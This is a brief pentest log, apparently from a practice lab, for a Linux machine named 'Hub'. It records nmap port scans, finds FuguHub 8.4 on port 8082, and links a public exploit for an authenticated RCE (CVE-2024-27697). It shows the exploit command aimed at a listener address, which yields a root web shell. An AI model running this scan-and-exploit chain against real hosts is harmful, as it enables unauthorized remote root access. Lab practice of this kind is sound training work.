Hub
๐งช Pentest Log: {{date:2025-08-07}}
๐ Target Information
- Machine Name: Hub
- IP Address: 192.168.123.25
- Operating System: Linux
ip=192.168.123.25
๐ก Enumeration
๐ Port Scanning
Command Used
ports=$(nmap -p- --min-rate=1000 -T4 $ip | grep '^[0-9]' | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//)
nmap -p$ports -sC -sV $ip -oN tcp_scan_result.txt
nmap -sU --top-ports 100 $ip -oN udp_scan_result.txt
Port 22
Port 80
Port 8082
FuguHub 8.4
Google for "FuguHub 8.4 exploit", found
https://github.com/SanjinDedic/FuguHub-8.4-Authenticated-RCE-CVE-2024-27697
Port 9999
๐ฃ Exploitation
๐ Vulnerability Summary
- Service / Port: 8082
- Vulnerability Type: RCE
๐ Exploit Execution
๐ง Exploit Method
Tool / Script Used:
https://github.com/SanjinDedic/FuguHub-8.4-Authenticated-RCE-CVE-2024-27697
python3 exploit.py -r 192.168.123.25 -rp 8082 -l 192.168.45.163 -p 8082
๐งฌ Privilege Escalation
๐ค Current Access
- User: root
- Groups: root
- Shell Type: web shell
๐ Enumeration
๐ Privilege Escalation Exploit
๐ Exploit Summary
- Technique Used: N/A
- Target Binary/Service: N/A
- Reference / Source: N/A